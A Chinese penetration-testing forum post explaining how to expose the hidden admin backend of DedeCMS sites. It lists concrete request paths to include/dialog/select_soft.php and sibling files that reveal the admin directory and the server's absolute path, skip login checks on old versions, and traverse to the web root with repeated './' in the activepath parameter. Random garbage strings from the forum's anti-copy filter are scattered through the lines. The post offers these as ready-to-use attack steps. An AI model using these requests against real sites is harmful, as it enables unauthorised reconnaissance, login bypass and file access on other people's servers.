找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2002|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
7 W5 r/ f3 J& m* }( R9 P- r  s" T9 L3 y  e2 o" i5 Y7 T) g
员帐号,新版本的就直接转向了后台.. F+ ^( t% l+ H' n( N# P5 Z

3 N4 D7 b1 Y0 Q8 H( B5 P2.include/dialog/config.php会爆出后台管理路径: I% S$ \* ]+ n2 ]

0 l: m: A& ?* v3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录6 A9 L, ]; u. u5 A
4 h( m3 o1 t3 b9 R+ R* c
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.& d  C: t0 I- J- ?8 T

8 z/ p) w4 K9 _/ ^5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉6 Y) T$ T% f$ H7 d/ {4 B
' D' x4 i, G& C" ~7 S
到根目录去.不过这些版本的访问地址有些不同.
' g; l4 G5 L$ S  u, ^4 s! U% O( D9 ?0 ?地址为require/dialog/select_soft.php?activepath=/././././././././
; B- p! y3 F2 M2 A* _% ^) ^3 {& Q
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
8 E1 J8 V+ H& W( ]存在相同问题的文件还有
8 X% ~6 _8 H2 d0 `  M+ Finclude\dialog\select_images.php
; v4 ^* A& ]5 ?; t7 k: M8 jinclude\dialog\select_media.php" h4 t: Y( ~* f% D/ z
include\dialog\select_templets.php​
1 d6 P1 }* |4 o; `
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表